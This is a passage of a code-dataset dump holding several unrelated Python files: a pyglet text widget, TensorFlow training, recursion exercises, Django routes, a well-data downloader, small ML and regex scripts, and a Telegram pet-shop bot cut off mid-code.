Control.teardown(self)\r\n\r\n if self.document is not None:\r\n self.document.delete_text(0, len(self.document.text))\r\n self.document = None\r\n\r\n def do_set_document_style(self, dialog):\r\n self.set_document_style = True\r\n\r\n # Check the style runs to make sure we don't stamp on anything\r\n # set by the user\r\n self._do_set_document_style('color', self.text_color or dialog.theme['text_color'])\r\n self._do_set_document_style('font_name', self.font or dialog.theme['font'])\r\n self._do_set_document_style('font_size', self.font_size or dialog.theme['font_size'])\r\n\r\n def get_text(self):\r\n return self.document.text\r\n\r\n def layout(self, x, y):\r\n self.x, self.y = x, y\r\n\r\n if self.content is not None:\r\n self.content.begin_update()\r\n self.content.x = x\r\n self.content.y = y\r\n\r\n if self.scrollbar is not None:\r\n pos = self.scrollbar.get(self.max_height,self.content.content_height)\r\n\r\n if pos != -self.content.view_y:\r\n #performance hack (was #self.content.view_y = -pos )\r\n #bypass reflowing glyphes\r\n pyglet.text.layout.ScrollableTextLayout._set_view_y(self.content, -pos)\r\n\r\n self.scrollbar.layout(x + self.content_width, y)\r\n\r\n self.content.end_update()\r\n\r\n\r\n def on_update(self, dt):\r\n '''\r\n On updates, we update the scrollbar and then set our view offset\r\n if it has changed.\r\n\r\n @param dt Time passed since last update event (in seconds)\r\n '''\r\n if self.scrollbar is not None:\r\n self.scrollbar.dispatch_event('on_update', dt)\r\n\r\n if self.needs_layout:\r\n self.needs_layout = False\r\n self.saved_dialog.set_needs_layout()\r\n\r\n def _force_refresh(self):\r\n '''\r\n Forces recreation of any graphic elements we have constructed.\r\n Overriden to avoid needlessly recreating pyglet text elements.\r\n '''\r\n if self.saved_dialog is not None:\r\n self.saved_dialog.set_needs_layout()\r\n\r\n def size(self, dialog):\r\n if dialog is None:\r\n return\r\n\r\n Control.size(self, dialog)\r\n if not self.set_document_style:\r\n # Set Document Style for unformatted Documment\r\n self.do_set_document_style(dialog)\r\n\r\n if self.content is None:\r\n self.content = KyttenIncrementalTextLayout( self.document, 
self.content_width,\r\n self.max_height, multiline=True,\r\n batch=dialog.batch, group=dialog.fg_group)\r\n\r\n if self.is_fixed_size or (self.max_height and self.content.content_height > self.max_height):\r\n self.height = self.max_height\r\n else:\r\n self.height = self.content.content_height\r\n\r\n self.content.height = self.height\r\n\r\n if self.always_show_scrollbar or (self.max_height and self.content.content_height > self.max_height):\r\n if self.scrollbar is None:\r\n self.scrollbar = VScrollbar(self.max_height)\r\n self.scrollbar.size(dialog)\r\n self.scrollbar.set(self.max_height, self.content.content_height)\r\n\r\n elif self.scrollbar is not None and (self.max_height and self.content.content_height < self.max_height):\r\n self.scrollbar.delete()\r\n self.scrollbar = None\r\n\r\n if self.scrollbar is not None:\r\n self.width = self.content_width + self.scrollbar.width\r\n if self.scrollbar_to_ensure_visible is not None:\r\n self.scrollbar.ensure_visible(*self.scrollbar_to_ensure_visible)\r\n self.scrollbar_to_ensure_visible=None\r\n\r\n else:\r\n self.width = self.content_width\r\n\r\n def ensure_line_visible(self, line):\r\n if self.content is not None:\r\n\r\n line = self.content.lines[line]\r\n if self.scrollbar is not None:\r\n self.scrollbar.ensure_visible(line.y,line.y+line.ascent-line.descent, line.ascent-line.descent)\r\n else:\r\n self.scrollbar_to_ensure_visible = (line.y,line.y+line.ascent-line.descent, line.ascent-line.descent)\r\n self._force_refresh()\r\n\r\n def set_content_width(self, width):\r\n self.content_width = width\r\n if self.content is not None:\r\n self.content.width = width\r\n self._force_refresh()\r\n\r\n def set_text(self, text, formatted=False):\r\n\r\n if formatted != self.isFormatted or self.document is None:\r\n self.set_document(self.create_document(text, formatted))\r\n else:\r\n self.document.text = string_to_unicode(text)\r\n\r\n self._force_refresh()#self.saved_dialog.set_needs_layout()#\r\n\r\n\r\n def insert_text(self, start, text, formatted=False):\r\n\r\n if self.document is not None:\r\n\r\n text = string_to_unicode(text)\r\n\r\n if formatted is not False:\r\n\r\n doc = pyglet.text.decode_attributed(text)\r\n\r\n if self.visible is True:\r\n self.content.begin_update()\r\n self.document.insert_text(start, doc.text)\r\n for attribute, runlist in iteritems(doc._style_runs):\r\n for s, st, value in runlist:\r\n self.document.set_style(start+s, start+st, {attribute:value})\r\n self.content.end_update()\r\n else:\r\n self.document.insert_text(start, doc.text)\r\n for attribute, runlist in iteritems(doc._style_runs):\r\n for s, st, value in runlist:\r\n self.document.set_style(start+s, start+st, {attribute:value})\r\n\r\n else:\r\n self.document.insert_text(start, text)\r\n\r\n self.needs_layout = True\r\n\r\n def append_text(self, text, formatted=False):\r\n '''\r\n Append Text to the end of the document\r\n '''\r\n self.insert_text(len(self.document.text), text, formatted)\r\n\r\n def set_links(self, link_reference):\r\n self.link_reference.update(link_reference)\r\n\r\n def on_mouse_press(self, x, y, *args):\r\n\r\n line = self.content.get_line_from_point(x, y)\r\n position = self.content.get_position_on_line(line, x)\r\n CALLBACK = self.document.get_style('link',position)\r\n\r\n if CALLBACK:\r\n try:\r\n CALLBACK_FUNC = self.link_reference[CALLBACK]\r\n except KeyError:\r\n raise KyttenDocumentError(\"In Formatted Document '{}' link reference '{}' is Invalid!\".format(self.name, CALLBACK))\r\n else:\r\n if not hasattr(CALLBACK_FUNC, 
'__iter__'):\r\n CALLBACK_FUNC()\r\n else:\r\n for callback_func in CALLBACK_FUNC:\r\n callback_func()\r\n\r\n def on_gain_focus(self):\r\n Control.on_gain_focus(self)\r\n if self.scrollbar is not None and self.saved_dialog is not None:\r\n self.saved_dialog.set_focus(self.scrollbar)\r\n\r\n def on_lose_highlight(self):\r\n Control.on_lose_highlight(self)\r\n\r\n if self.scrollbar is not None and self.saved_dialog is not None:\r\n self.saved_dialog.set_focus(None)\r\n\r\n def hit_test(self, x, y):\r\n '''\r\n True if the given point lies within our area.\r\n\r\n @param x X coordinate of point\r\n @param y Y coordinate of point\r\n @returns True if the point is within our area\r\n '''\r\n if self.scrollbar is not None:\r\n return x >= self.x and x < self.x + self.width - self.scrollbar.width and \\\r\n y >= self.y and y < self.y + self.height\r\n else:\r\n return x >= self.x and x < self.x + self.width and \\\r\n y >= self.y and y < self.y + self.height\r\n","sub_path":"kytten/document.py","file_name":"document.py","file_ext":"py","file_size_in_byte":11934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"513913264","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport time\n\nimport tensorflow as tf\n\nimport model\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\nfrom input_pipeline import inputs\nfrom drawer import LogDirs\n\ndef train(tfrecords_path, tfevents_path, ckpt_path, batch_size, num_epochs):\n with tf.Graph().as_default():\n with tf.name_scope('input'):\n images, labels = inputs(path=tfrecords_path,\n batch_size=batch_size,\n num_epochs=num_epochs)\n with tf.name_scope('dropout'):\n keep_prob = tf.placeholder(tf.float32)\n logits = model.inference(images, keep_prob)\n prediction = tf.nn.softmax(logits)\n loss = model.loss(logits, labels)\n accuracy = model.evaluation(logits, labels)\n train_op = model.training(loss, learning_rate=0.01)\n init_op = tf.group(tf.global_variables_initializer(),\n tf.local_variables_initializer())\n # Create a session for running operations in the Graph.\n sess = tf.Session()\n merged = tf.summary.merge_all()\n writer = tf.summary.FileWriter(tfevents_path, sess.graph)\n # Add ops to save and restore all the variables.\n saver = tf.train.Saver(max_to_keep=100000)\n sess.run(init_op)\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n step=0\n try:\n while not coord.should_stop():\n start_time = time.time()\n # training\n _ = sess.run(train_op, feed_dict={keep_prob: 0.5})\n duration = time.time() - start_time\n # write summary and print loss\n if step % 100 == 0:\n summary, acc_value, loss_value = sess.run([merged, accuracy, loss],\n feed_dict={keep_prob: 1.0})\n writer.add_summary(summary, step)\n print('Step %d: loss = %.2f, accuracy = %.3f (%.3f sec)' % (step, loss_value, acc_value, duration))\n if step % 1000 == 0:\n saver.save(sess, ckpt_path + '/run', global_step=step)\n step += 1\n except tf.errors.OutOfRangeError:\n print('Done training for %d epochs, %d steps.' 
% (num_epochs, step))\n finally:\n writer.close()\n # When done, ask the threads to stop.\n coord.request_stop()\n # Wait for threads to finish.\n coord.join(threads)\n sess.close()\n\n\nif __name__ == '__main__':\n log = LogDirs(dpath = '../../logs/vggnet-0')\n log.mkdirs()\n train(tfrecords_path = '../../data/tfrecords/jet15_rgb_train.tfrecords',\n tfevents_path = log.tfevents_train,\n ckpt_path = log.ckpt,\n batch_size = 100,\n num_epochs=10)\n","sub_path":"deepJet/vggnet/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"298212570","text":"from collections.abc import Iterable\nfrom copy import deepcopy\nfrom enum import Enum\nfrom itertools import permutations\n\n\ndef count_ways(n):\n if n < 0:\n return 0\n elif n == 0:\n return 1\n return count_ways(n - 1) + count_ways(n - 2) + count_ways(n - 3)\n\n\ndef count_ways_dynamic(n, l: list):\n if n < 0:\n return 0\n elif n == 0:\n return 1\n elif not l[n]:\n l[n] = (count_ways_dynamic(n - 1, l)\n + count_ways_dynamic(n - 2, l)\n + count_ways_dynamic(n - 3, l))\n return l[n]\n\n\nclass Field():\n def __init__(self, i=5, nonfree_points: Iterable=None):\n self._matrix = []\n self._nonfree_points = []\n self._nonfree_points += nonfree_points\n for _ in range(i):\n self._matrix.append([None for _ in range(i)])\n\n def get_path(self, t: tuple, path: list, cache: dict):\n path.append(t)\n #b = cache.get(t)\n #if b is not None:\n # return b\n x = t[0]\n y = t[1]\n if x == 0 and y == 0:\n return True\n next_p = (x - 1, y)\n b = False\n if x > 0 and self._is_free(next_p):\n b = self.get_path(next_p, path, cache)\n next_p = (x, y - 1)\n if not b and y > 0 and self._is_free(next_p):\n b = self.get_path(next_p, path, cache)\n #if not b:\n # path.remove(t)\n cache[t] = b\n return b\n\n def _is_free(self, t: tuple):\n if t in self._nonfree_points:\n return False\n return True\n\n\ndef find_magic_index(ints: 'Sorted linear collection',\n left: int, right: int) -> int:\n \"\"\"Returns index if ints[index] == index\"\"\"\n pos = (left + right) // 2\n if ints[pos] == pos:\n return pos\n elif ints[pos] < pos:\n return find_magic_index(ints, pos + 1, right)\n else:\n return find_magic_index(ints, left, pos - 1)\n\n\ndef generate_brackets(n):\n for i in range(1, n + 1):\n yield from _generate_brackets('', 0, 0, i)\n\n\ndef _generate_brackets(s, op, cl, pairs):\n if op == pairs and cl == pairs:\n yield s\n else:\n if op < pairs:\n yield from _generate_brackets(s + '(', op + 1, cl, pairs)\n if cl < op:\n yield from _generate_brackets(s + ')', op, cl + 1, pairs)\n\n\nclass Color(Enum):\n black = 1\n red = 2\n blue = 3\n\n\ndef flood_fill(screen: list, x, y, old_color: Color, new_color: Color):\n if x < 0 or x == len(screen[0]) or y < 0 or y == len(screen):\n return\n if screen[y][x] != old_color:\n return\n screen[y][x] = new_color\n flood_fill(screen, x - 1, y, old_color, new_color)\n flood_fill(screen, x + 1, y, old_color, new_color)\n flood_fill(screen, x, y + 1, old_color, new_color)\n flood_fill(screen, x, y - 1, old_color, new_color)\n\n\ndef make_change(n, denom):\n next_denom = 0\n if denom == 25:\n next_denom = 10\n elif denom == 10:\n next_denom = 5\n elif denom == 5:\n next_denom = 1\n else:\n return 1\n ways = 0\n i = 0\n while i * denom <= n:\n ways += make_change(n - i * denom, next_denom)\n i += 1\n return ways\n\n\ndef place_queens(n=8):\n cols = range(n)\n for vec in permutations(cols):\n if (n == len(set(vec[i] + i for i 
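# Usage sketch for the memoised staircase counter defined above: the cache
# must be a list of length n + 1 seeded with None so each entry is computed
# exactly once. 274 is the way count for n = 10 with 1/2/3-step hops.
n = 10
cache = [None] * (n + 1)
assert count_ways(n) == count_ways_dynamic(n, cache) == 274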
in cols))\n == len(set(vec[i] - i for i in cols))):\n yield vec\n\n\nclass Box():\n def __init__(self, size=1):\n self.size = size\n\n def can_be_above(self, box):\n return box.size > self.size\n\n def __eq__(self, other):\n return self.size == other.size\n\n def __hash__(self):\n return hash(self.size)\n\n\ndef create_box_stack(boxes: list, bottom: Box, stack_map: dict):\n if bottom and bottom in stack_map:\n return stack_map[bottom]\n max_height = 0\n max_stack = None\n for i in range(len(boxes)):\n if boxes[i].can_be_above(bottom):\n new_stack = create_box_stack(boxes, boxes[i], stack_map)\n new_height = len(new_stack)\n if new_height > max_height:\n max_stack = new_stack\n max_height = new_height\n if not max_stack:\n max_stack = []\n if bottom:\n max_stack.append(bottom)\n stack_map[bottom] = max_stack\n return deepcopy(max_stack)","sub_path":"recursion.py","file_name":"recursion.py","file_ext":"py","file_size_in_byte":4291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"331697451","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.listproduits),\n path('listproduits/', views.listproduits, name='1'),\n path('addproduits/', views.addproduits, name='2'),\n path('updateproduits/', views.updateproduits, name='3'),\n path('deleteproduits/', views.deleteproduits, name='4'),\n path('addapprovs/', views.addapprovs, name='5'),\n path('modifapprovs/', views.modifapprovs, name='6'),\n path('listapprovs/', views.listapprovs, name='7'),\n path('decisionapprovs/', views.decisionapprovs, name='8'),\n path('signin/', views.signin, name='9'),\n path('signup/', views.signup, name='10'),\n path('listuser', views.listuser, name='11'),\n path('listrmgapprovs/', views.listrmgapprovs, name='12'),\n path('listinferiorapprovs/', views.listinferiorapprovs, name='13'),\n path('allapprovs/', views.allapprovs, name='14')\n\n]","sub_path":"suivi_budgetaire/stock/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"591433385","text":"# coding=utf8\n\n# 1、导入库\nimport requests\nimport json\nimport csv\nimport os\n\n\ndef GetA1DataCollectionManage(url, JsonFileName, CsvFileName):\n AllWell_JSON = requests.get(url)\n JsonStr = AllWell_JSON.text\n # 替换字符串中的换行\n JsonStr = JsonStr.replace(\"\\\\r\\\\n\", \"\")\n # 替换日期中的时间00:00:00部分\n JsonStr = JsonStr.replace(\" 00:00:00\", \"\")\n \n aa = json.loads(JsonStr) # 通过JSON模块转化为dict\n\n # 写入文件\n # ensure_ascii=False 不将字符串转化为ascii输出,解决中文输出问题\n # indent=0 格式化输出参数,可为负数、0、正数、\"\"、\"\\t\"等\n with open(JsonFileName, 'w') as f:\n json.dump(aa, f, ensure_ascii=False, indent=0)\n \n print(\"当前的网页网址:%s\" % AllWell_JSON.url)\n print(\"下载完成!\")\n\n result = aa[\"result\"]\n\n # open函数中encoding参数设为'utf-8'时,文件以'utf-8'编码格式保存文件,Excel打开csv文件中文乱码\n # encoding设为'utf_8_sig',文件以'utf-8-bom'编码格式保存文件,Excel打开csv文件中文正常显示\n # encoding设为'gb18030',文件以'gb18030'编码格式保存文件,Excel打开csv文件中文正常显示\n with open(CsvFileName, 'w', newline='', encoding='gb18030') as f:\n writer = csv.writer(f)\n writer.writerow(result[0].keys())\n for row in result:\n writer.writerow(row.values())\n\n print(\"转换完成\")\n pass\n\n\nif __name__ == \"__main__\":\n # 下载所有井基本信息\n AllWell_Url = \"http://10.86.13.221/jsvc/service/A1_dataStatisBusiness/getA1DataCollectionManage?\"\n # AllWell_Url = \"http://10.86.13.221/jsvc/service/A1_dataStatisBusiness/getA1DataCollectionManagePage?page=1&rows=5\"\n AllWell_JsonFileName = 
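# Sanity check for place_queens() above: the classic 8-queens puzzle has
# exactly 92 solutions (each yielded vector holds one column index per row).
# Note for create_box_stack(): can_be_above() dereferences `box.size`, so call
# it with a sentinel base such as Box(float('inf')) rather than bottom=None.
assert len(list(place_queens(8))) == 92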
r\"F:\\冀东油田数据库应用系统\\冀东油田-数据库-提取地址\\A1-2.0数据\\getA1DataCollectionManage.json\"\n AllWell_CsvFileName = r\"F:\\冀东油田数据库应用系统\\冀东油田-数据库-提取地址\\A1-2.0数据\\getA1DataCollectionManage.csv\"\n if os.path.isfile(AllWell_JsonFileName) is False or os.path.isfile(AllWell_CsvFileName) is False:\n GetA1DataCollectionManage(AllWell_Url, AllWell_JsonFileName,AllWell_CsvFileName)\n\n # 给定wellid参数,下载井的单井卡片\n WellCardData_Url = \"http://10.86.13.221/jsvc/service/A1_dataManagement/getWellCardDataByWellId?wellId=\"\n WellCard_JsonFileName = r\"F:\\冀东油田数据库应用系统\\冀东油田-数据库-提取地址\\A1-2.0数据\\单井卡片\\单井卡片.json\"\n WellCard_CsvFileName = r\"F:\\冀东油田数据库应用系统\\冀东油田-数据库-提取地址\\A1-2.0数据\\单井卡片\\单井卡片.csv\"\n\n with open(AllWell_JsonFileName, 'r', 1) as f:\n AllWell_Json = json.load(f)\n\n result = {\"resultCode\": 0, \"result\": [], \"msgId\": \"\", \"success\": True}\n i = 0\n print(\"开始下载单井卡片!\")\n if os.path.isfile(WellCard_JsonFileName) is False:\n # with open(AllWell_JsonFileName, 'r', 1) as f:\n # WellCard_Json = json.load(f)\n # f.close()\n # ToDoList = \"\"\n\n for row in AllWell_Json[\"result\"]:\n JsonStr = requests.get(WellCardData_Url + row[\"WELL_ID\"])\n bb = JsonStr.json()\n result[\"result\"] += bb[\"result\"]\n print(i, bb[\"result\"][0][\"WELL_COMMON_NAME\"])\n i += 1\n# if i == 30:\n# break\n pass\n \n str1 = json.dumps(result, ensure_ascii=False)\n str1 = str1.replace(\"\\\\r\\\\n\", \"\")\n# str1 = str1.replace(\"\\\\r\", \"\")\n# str1 = str1.replace(\"\\\\n\", \"\")\n# str1 = str1.replace(\"\\r\\n\", \"\")\n# str1 = str1.replace(\"\\r\", \"\")\n# str1 = str1.replace(\"\\n\", \"\")\n str1 = str1.replace(\" 00:00:00\", \"\")\n result = json.loads(str1)\n\n with open(WellCard_JsonFileName, 'w') as f:\n json.dump(result, f, ensure_ascii=False, indent=0)\n# json.dump(result, f, ensure_ascii=False, indent=0)\n \n print(\"下载完成!\")\n\n # open函数中encoding参数设为'utf-8'时,文件以'utf-8'编码格式保存文件,Excel打开csv文件中文乱码\n # encoding设为'utf_8_sig',文件以'utf-8-bom'编码格式保存文件,Excel打开csv文件中文正常显示\n # encoding设为'gb18030',文件以'gb18030'编码格式保存文件,Excel打开csv文件中文正常显示\n with open(WellCard_CsvFileName, 'w', newline='', encoding='gb18030') as f:\n writer = csv.writer(f)\n writer.writerow(result[\"result\"][0].keys())\n for row in result[\"result\"]:\n # print(row.values())\n writer.writerow(row.values())\n\n print(\"转换完成\")\n","sub_path":"Json/下载A1井基本信息.py","file_name":"下载A1井基本信息.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"548861519","text":"import seaborn as sns\nimport pandas as pd\nimport matplotlib.pyplot as plt\ndf = pd.read_csv('crimeRatesByState2005.csv')\n\ndf1 = df[df.state != \"United States\"]\ndf1 = df1[df1.state != \"District of Columbia\"]\ndf1 = df1.drop(['state'], axis=1)\ndf1 = df1.drop(['population'], axis = 1)\ng = sns.pairplot(df1, diag_kind='kde')\nplt.show()\n","sub_path":"DVT/chapter04/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"393267960","text":"import sklearn.datasets\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom random import randint\nfrom sklearn.metrics import accuracy_score\n\nbreast_cancer = sklearn.datasets.load_breast_cancer()\n\nX = breast_cancer.data\nY = breast_cancer.target\n\ndata = pd.DataFrame(breast_cancer.data, columns=breast_cancer.feature_names)\ndata['class'] = breast_cancer.target\n\nX = data.drop('class', axis=1)\nY = 
data['class']\n\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.1, stratify = Y, random_state=1)\n\nX_binarised_train = X_train.apply(pd.cut, bins=2, labels=[1,0])\nX_binarised_test = X_test.apply(pd.cut, bins=2, labels=[1,0])\n\nX_binarised_test = X_binarised_test.values\nX_binarised_train = X_binarised_train.values\n\nclass MPNeuron:\n \n def __init__(self):\n self.b = None\n \n def model(self, x):\n return(sum(x) >= self.b)\n \n def predict(self, X):\n Y = []\n for x in X:\n result = self.model(x)\n Y.append(result)\n return np.array(Y)\n \n def fit(self, X, Y):\n accuracy = {}\n \n for b in range(X.shape[1] + 1):\n self.b = b\n Y_pred = self.predict(X)\n accuracy[b] = accuracy_score(Y_pred, Y)\n \n best_b = max(accuracy, key = accuracy.get)\n self.b = best_b\n \n print('Optimal value of b is', best_b)\n print('Highest accuracy is', accuracy[best_b])\n\nmp_neuron = MPNeuron()\nmp_neuron.fit(X_binarised_train, Y_train)\n\nY_test_pred = mp_neuron.predict(X_binarised_test)\naccuracy_test = accuracy_score(Y_test_pred, Y_test)","sub_path":"Python MP Neuron Perceptron/0214_MPNeuronAndPerceptron-pythonfile.py","file_name":"0214_MPNeuronAndPerceptron-pythonfile.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"475105534","text":"import re\nimport os\nimport argparse\nimport sys\n\ndef parse_logs(filepath):\n if os.path.exists(filepath):\n pattern = re.compile(('ERROR|WARNING'))\n with open(filepath) as f:\n log = f.read()\n errors = re.findall(pattern, log)\n if errors :\n for e in errors:\n if (e == 'ERROR'):\n print(\"Error found\")\n elif(e == 'WARNING'):\n print('WARNING Found')\n else:\n print(\"No errors or WARNING found\")\n else:\n print(f\"filepath {filepath} doesnt exist\")\n\n\ndef logs_wrapper(args):\n parse_logs(args.filepath)\n\ndef main():\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers()\n\n logs_parser = subparsers.add_parser('getlogs')\n logs_parser.add_argument('filepath')\n logs_parser.set_defaults(func=logs_wrapper)\n\n args = parser.parse_args(sys.argv[1:])\n args.func(args)\n\nif __name__ == '__main__':\n main()\n \n ","sub_path":"mypycli/mytool.py","file_name":"mytool.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"336522700","text":"import re, os\n\n__all__ = [\n \"StringMatcher\",\n \"MatchList\",\n \"FileMatcher\"\n]\n\nclass StringMatcher:\n \"\"\"\n Defines a simple filter that applies to a file and determines whether or not it matches the pattern\n \"\"\"\n\n def __init__(self, match_patterns, negative_match = False):\n if isinstance(match_patterns, str):\n pattern = re.compile(match_patterns)\n self.matcher = lambda f, p = pattern: re.match(p, f)\n elif hasattr(re, \"Pattern\") and isinstance(match_patterns, re.Pattern): # re.Pattern is new as of python3.7...\n self.matcher = lambda f, p = match_patterns: re.match(p, f)\n elif type(match_patterns).__name__==\"SRE_Pattern\": # pre 3.7\n self.matcher = lambda f, p = match_patterns: re.match(p, f)\n elif isinstance(match_patterns, StringMatcher):\n self.matcher = match_patterns.matches\n elif callable(match_patterns):\n self.matcher = match_patterns\n else:\n ff = type(self)\n match_patterns = tuple(ff(m) if not isinstance(m, StringMatcher) else m for m in match_patterns)\n self.matcher = lambda f, p = match_patterns: all(m.matches(f) for m in p)\n\n self.negate = 
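# Toy illustration of the MP neuron decision rule used above: with binarised
# features, model(x) fires exactly when at least b inputs are 1, so fit() is
# simply a scan over every candidate threshold for the most accurate b.
toy = MPNeuron()
toy.b = 2
assert toy.model([1, 1, 0]) and not toy.model([1, 0, 0])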
negative_match\n\n def matches(self, f):\n m = self.matcher(f)\n if self.negate:\n m = not m\n return m\n\nclass MatchList(StringMatcher):\n \"\"\"\n Defines a set of matches that must be matched directly (uses `set` to make this basically a constant time check)\n \"\"\"\n\n def __init__(self, *matches, negative_match = False):\n self.match_list = set(matches)\n super().__init__(lambda f, m=self.test_match: m(f), negative_match = negative_match)\n def test_match(self, f):\n return f in self.match_list\n\nclass FileMatcher(StringMatcher):\n \"\"\"\n Defines a filter that uses StringMatcher to specifically match files\n \"\"\"\n\n def __init__(self, match_patterns, negative_match = False, use_basename = False):\n super().__init__(match_patterns, negative_match = negative_match)\n self.use_basename = use_basename\n\n def matches(self, f):\n f_name = f if not self.use_basename else os.path.basename(f)\n return super().matches(f_name)","sub_path":"McUtils/Misc/FileMatcher.py","file_name":"FileMatcher.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"572100253","text":"import re\nfrom pprint import pprint\n\ndef get_ip_from_cfg(filename):\n with open(filename) as f:\n text = f.read()\n res = []\n regex = r'ip address ((?:\\d+\\.){3}\\d) ((?:\\d+\\.){3}\\d+)'\n match = re.finditer(regex, text, re.DOTALL)\n for m in match:\n res.append(m.groups())\n return res\n \nfin_tuple = get_ip_from_cfg('config_r1.txt')\npprint(fin_tuple)\n","sub_path":"exercises/15_module_re/task_15_1.py","file_name":"task_15_1.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"362659514","text":"# по ссылке можно реализовать видеотрансляцию, а также информацию о родителях, и т.п.\n\nfrom typing import Dict\n\nimport telebot\nimport data\n\nlanguage = [];\nchat_id = dict()\nchat_index = 0;\n\nshow_time_index = [] # False\nbuy_time_index = [] # False\nwromg_attemp = [] # 0\navailable_animal = 5\navailble_attemp = 3\n\nanimals = {\n \"1\": \"Алекс: \\n\\thttps://vk.com/video?q=%D1%89%D0%B5%D0%BD%D0%BE%D0%BA&z=video-67991642_456247336\",\n \"2\": \"Бим: \\n\\thttps://vk.com/video?q=%D1%89%D0%B5%D0%BD%D0%BE%D0%BA&z=video-67991642_456247336\",\n \"3\": \"Ватсон: \\n\\thttps://vk.com/video?q=%D1%89%D0%B5%D0%BD%D0%BE%D0%BA&z=video-67991642_456247336\",\n \"4\": \"Голд: \\n\\thttps://vk.com/video?q=%D1%89%D0%B5%D0%BD%D0%BE%D0%BA&z=video-67991642_456247336\",\n \"5\": \"Добби: \\n\\thttps://vk.com/video?q=%D1%89%D0%B5%D0%BD%D0%BE%D0%BA&z=video-67991642_456247336\"\n}\n\nbot = telebot.TeleBot(data.token)\n\n\ndef order_text(message):\n global language\n if language[chat_id[message.chat.id]]:\n return \"Спасибо за Ваш заказ, в ближайше.\"\n else:\n return \"Thanks for your order. 
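# Caveat for get_ip_from_cfg() above (sketch): the first capture group ends in
# a bare \d, so any address whose final octet has two or more digits
# ('10.1.1.15') fails to match at all and is silently skipped. A version that
# accepts full octets in both groups:
regex = r'ip address ((?:\d+\.){3}\d+) ((?:\d+\.){3}\d+)'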
Our specialist will contact you.\"\n\n\ndef start_text(message):\n global language\n if language[chat_id[message.chat.id]]:\n return \"Это онлайн питомник Селена Вайт.\\n Воспользуйтесь /help для информации о доступных командах\"\n else:\n return \"This is a online zoo market Selena White.\\nTry /help for main commands.\"\n\n\ndef help_text(message):\n global language\n if language[chat_id[message.chat.id]]:\n return \"/show - показать животного(ых)\\n\" \\\n \"/contact - для связи с нашим специалистом\\n\" \\\n \"/buy - для покупки животного\\n\" \\\n \"/change_language - изменить язык с русского на английский и обратно\"\n else:\n return \"/show - show animals\\n\" \\\n \"/contact - our specialist will contact you\\n\" \\\n \"/buy - buy animal\\n\" \\\n \"/change_language - change Russian to English and back\"\n\n\ndef cotact_text(message):\n global language\n if language[chat_id[message.chat.id]]:\n return \"В ближайшее время наш специалист с Вами свяжется.\"\n else:\n return \"Our specialist will contact you\"\n\n\ndef sorry_text(message):\n global language\n if language[chat_id[message.chat.id]]:\n return \"Неопознанное сообщение. Пожалуйста воспользуйтесь пожалуйста /help\"\n else:\n return \"Sorry, unknown message. Try /help for detail\"\n\n\ndef send_message_value_error(message):\n global language\n if language[chat_id[message.chat.id]]:\n bot.send_message(message.chat.id,\n \"Введите пожалуйста число.\\n\"\n \"Сейчас доступно \" +\n str(available_animal) +\n \" животных\\n\"\n \"У Вас осталось \" +\n str(availble_attemp - wromg_attemp[chat_id[message.chat.id]] - 1) +\n \" попыток\\n\")\n else:\n bot.send_message(message.chat.id,\n \"Sorry, but this isn't number.\\nNow available animals: \" +\n str(available_animal) +\n \"\\nPlease try again.\\n\"\n \"You have \" +\n str(availble_attemp - wromg_attemp[chat_id[message.chat.id]] - 1) +\n \" attempts left\")\n\n\ndef send_message_show(message):\n global bot\n if language[chat_id[message.chat.id]]:\n bot.send_message(message.chat.id,\n \"Сейчас доступно \" + str(available_animal) +\n \" животных\\nВведите 'All' для того чтобы посмотреть \"\n \"всех или номер для просмотра конкретного животного.\")\n else:\n bot.send_message(message.chat.id,\n \"Now available animals: \" +\n str(available_animal) +\n \"\\nEnter 'All' to view all animals or animal number.\")\n\n\ndef send_message_buy(message):\n global bot\n if language[chat_id[message.chat.id]]:\n bot.send_message(message.chat.id,\n \"Сейчас доступно: \" +\n str(available_animal) +\n \"животных\\nВведите номер для покупки.\")\n else:\n bot.send_message(message.chat.id,\n \"Now available animals: \" +\n str(available_animal) +\n \"\\nEnter animal number.\")\n\n\ndef check_chat(message):\n global chat_id\n if message.chat.id not in chat_id:\n global show_time_index\n global buy_time_index\n global wromg_attemp\n global chat_index\n global language\n chat_id[message.chat.id] = chat_index\n chat_index += 1\n show_time_index.append(False)\n buy_time_index.append(False)\n wromg_attemp.append(0)\n language.append(1)\n\n\ndef show_all(message, show_time_index):\n global bot\n for i in range(len(animals)):\n bot.send_photo(message.chat.id, open(\"D:/_USE_/Project_2/Bot_3/img/\" + str(i+1) + \".jpg\", 'rb'));\n bot.send_message(message.chat.id, animals[str(i+1)])\n show_time_index[chat_id[message.chat.id]] = False\n\n\ndef show_time(message):\n global availble_attemp;\n global show_time_index\n global 